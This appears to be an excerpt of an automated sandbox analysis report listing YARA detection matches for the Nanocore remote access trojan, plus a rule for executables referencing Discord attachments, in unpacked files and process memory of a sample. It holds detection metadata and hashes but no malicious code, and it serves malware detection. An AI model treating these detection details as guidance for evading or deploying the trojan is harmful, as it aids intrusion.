    Source: 9.2.p9Ts9VV2NZ.exe.57b0000.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.57b0000.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 15.0.svchost.exe.c50000.11.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 0.0.p9Ts9VV2NZ.exe.1e0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 9.2.p9Ts9VV2NZ.exe.7180000.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.7180000.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.49d28c9.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.49d28c9.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 8.2.p9Ts9VV2NZ.exe.70000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 9.2.p9Ts9VV2NZ.exe.7300000.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.7300000.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 13.2.svchost.exe.3d8ed58.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 13.2.svchost.exe.3d8ed58.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 9.2.p9Ts9VV2NZ.exe.4bcc923.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.4bcc923.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.4aecc42.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.4aecc42.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.4aecc42.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 13.0.svchost.exe.3d8ed58.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 13.0.svchost.exe.3d8ed58.16.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 13.0.svchost.exe.3d8ed58.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 13.0.svchost.exe.3d8ed58.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000009.00000002.576136688.0000000006160000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000009.00000002.576136688.0000000006160000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000009.00000002.578985406.00000000073D0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000009.00000002.578985406.00000000073D0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000000.00000000.354484240.0000000004271000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000000.00000000.354484240.0000000004271000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000009.00000002.578768354.0000000007320000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000009.00000002.578768354.0000000007320000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000009.00000002.575763359.00000000057B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000009.00000002.575763359.00000000057B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 0000000F.00000000.439800347.00000000050AF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000000F.00000000.439800347.00000000050AF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000009.00000002.564742845.000000000407B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000009.00000002.557519070.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000009.00000002.557519070.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000009.00000002.578744575.0000000007310000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000009.00000002.578744575.0000000007310000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000009.00000002.578923470.0000000007390000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000009.00000002.578923470.0000000007390000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000009.00000002.578826405.0000000007350000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000009.00000002.578826405.0000000007350000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000009.00000002.578840773.0000000007360000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000009.00000002.578840773.0000000007360000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000009.00000002.566519721.0000000004B62000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000009.00000002.578220944.0000000007180000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000009.00000002.578220944.0000000007180000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000009.00000002.567629894.0000000004C4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000009.00000002.578895486.0000000007380000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000009.00000002.578895486.0000000007380000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000009.00000002.578721350.0000000007300000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000009.00000002.578721350.0000000007300000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000009.00000002.578805532.0000000007340000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000009.00000002.578805532.0000000007340000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 0000000D.00000002.576454240.0000000003D8E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000000D.00000002.576454240.0000000003D8E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000009.00000002.578788151.0000000007330000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000009.00000002.578788151.0000000007330000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000009.00000002.578193481.0000000007170000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000009.00000002.578193481.0000000007170000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 0000000F.00000000.461847446.00000000050AF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000000F.00000000.461847446.00000000050AF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000009.00000002.566082157.0000000004AEC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000000D.00000000.451141617.0000000003D8E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000000D.00000000.451141617.0000000003D8E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000000D.00000000.426806746.0000000003D8E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000000D.00000000.426806746.0000000003D8E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: Process Memory Space: p9Ts9VV2NZ.exe PID: 4588, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: Process Memory Space: p9Ts9VV2NZ.exe PID: 4588, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: Process Memory Space: p9Ts9VV2NZ.exe PID: 6320, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: Process Memory Space: p9Ts9VV2NZ.exe PID: 6320, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: Process Memory Space: svchost.exe PID: 6568, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: Process Memory Space: svchost.exe PID: 6568, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: Process Memory Space: svchost.exe PID: 6828, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: Process Memory Space: svchost.exe PID: 6828, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
